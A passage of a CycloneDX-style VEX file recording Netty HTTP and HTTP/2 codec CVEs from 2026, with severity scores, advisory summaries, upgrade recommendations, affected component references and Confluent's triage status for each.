          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56746",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        284
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, are vulnerable to security control bypass during the origin evaluation process. CorsHandler provides a shortCircuit() configuration designed to reject unauthorized cross-origin requests immediately, acting as a security control before requests reach the application. However, due to a logical operator error in the origin evaluation process, this protection can be entirely bypassed. An attacker can bypass the short-circuit mechanism by sending a request with an Origin: null header. This failure forwards unauthorized requests to the backend application, bypassing intended access controls. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56746"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56746"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6cqp-g7gg-8hr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56746"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56746"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:47:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56819",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        401
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, a remote unauthenticated peer can leak one direct `ByteBuf` per HTTP/2 `DATA` frame in applications that enable HTTP/2 content decompression via `DelegatingDecompressorFrameListener`. When a `DATA` frame is processed for a stream whose decompressor has already been closed, `Http2Decompressor.decompress(...)` calls `decompressor.writeInbound(data.retain())` and does not release the retained buffer on the error path, eventually exhausting direct memory and crashing the JVM. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56819"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56819"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003bhttps://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-93wv-jw9v-4972"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56819"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56819"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:46:35+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#f36d9be0-223a-480d-ac43-4ccda81eafea"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#f05fb034-d141-40cb-b24f-e178578dfdfe"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#9c9a0197-9546-4464-b832-c43608fa1643"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f497f4cd-758e-453a-a598-0684fb4bd0bd"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f6c644f2-1cb7-46db-ac12-0d4298df0276"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#fa9d4f04-e3b4-4e69-a087-ba1f69b1a773"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#ede0b250-e597-45c2-8ba1-eec97af11449"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#bdbc2685-118b-4282-97a3-ed98be0c136f"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f23f079c-11fd-406f-bab1-ee328be73082"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#fab8a7cd-cc02-4201-b2b7-328aa920d10e"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#e6577c8c-2220-42f5-a711-6e4fde63083d"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ccb0e784-5e2d-4081-b505-11742ec045e6"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fa99c0f8-15bc-4197-ab71-3f7e1a5138b8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fea89b6d-6d6d-4359-9491-46720bbafcad"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e8933146-8b13-43c7-80d7-1c358686d246"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f13f00e8-36ba-4779-8da7-32d548d02884"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#a5e6c908-d14e-43d9-9cd3-fce99ad1f613"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#bfb5183b-50d4-4228-8f19-a49960f6fcb5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-59898",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework.  Prior to versions 4.1.136.Final and 4.2.16.Final, ab attacker can force WebSocket upgrade via the lax V07 (or V08) handshaker by sending `Sec-WebSocket-Version: 7` and omitting `Connection: Upgrade` / `Upgrade: websocket` headers, completing a protocol switch that a proxy would not recognize as an Upgrade request and enabling HTTP request smuggling / protocol-confusion attacks. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59898"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59898"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4mp9-239f-g9hg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59898"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59898"
        }
      ],
      "published": "2026-07-29T19:16:48+00:00",
      "updated": "2026-08-06T20:35:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59899",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, `HttpContentEncoder` (the superclass of the production handler `HttpContentCompressor`) maintains a per-channel `ArrayDeque<CharSequence>` named `acceptEncodingQueue` that accumulates attacker-controlled data without any size limit. The queue is filled on the I/O thread for every inbound HTTP request and drained only when the application later writes a non-1xx response. This creates a resource exhaustion vulnerability when an attacker exploits HTTP/1.1 pipelining to flood the connection with requests faster than the application produces responses. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
